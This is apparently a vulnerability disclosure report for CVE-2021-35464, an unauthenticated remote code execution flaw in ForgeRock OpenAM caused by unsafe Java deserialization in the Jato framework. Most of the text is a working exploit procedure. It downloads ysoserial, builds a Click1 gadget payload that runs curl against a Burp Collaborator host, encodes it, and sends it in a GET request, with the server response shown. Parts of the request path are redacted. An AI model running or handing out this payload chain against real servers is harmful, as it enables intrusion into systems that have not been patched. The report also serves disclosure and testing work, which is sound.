RCE is possible thanks to unsafe Java deserialization in the Jato framework used by OpenAM.
An unauthenticated, 3rd-party attacker or adversary can execute remote code
ββββ
ForgeRock OpenAM
CVE-2021-35464
First we need to build the payload:
wget https://github.com/Bin4xin/sweet-ysoserial/blob/master/target/ysoserial-0.0.6-SNAPSHOT-all.jar
then
java -jar ysoserial-master-SNAPSHOT.jar Click1 "curl https://g0h7qcjzwzpzdh2ar6b5f9x3puvkj9.burpcollaborator.net" | (echo -ne \\x00 && cat) | base64 | tr '/+' '_-' | tr -d '=' | tr -d '\n' > payload.txt
You need to change the burp Collaborator id to test it properly.
The payload is now saved in the payload.txt file.
Now we need to use the following request:
GET /ββββββββββ=XYZ HTTP/1.1
Host: 127.0.0.1
Replace XYZ by the payload saved into the payload.txt file.
The response
HTTP/1.1 302 Found
Cache-Control: private
Location: https://127.0.0.1:443/openam/base/AMInvalidURL
Content-Length: 0
The HTTP Request sent the collaborator :
βββ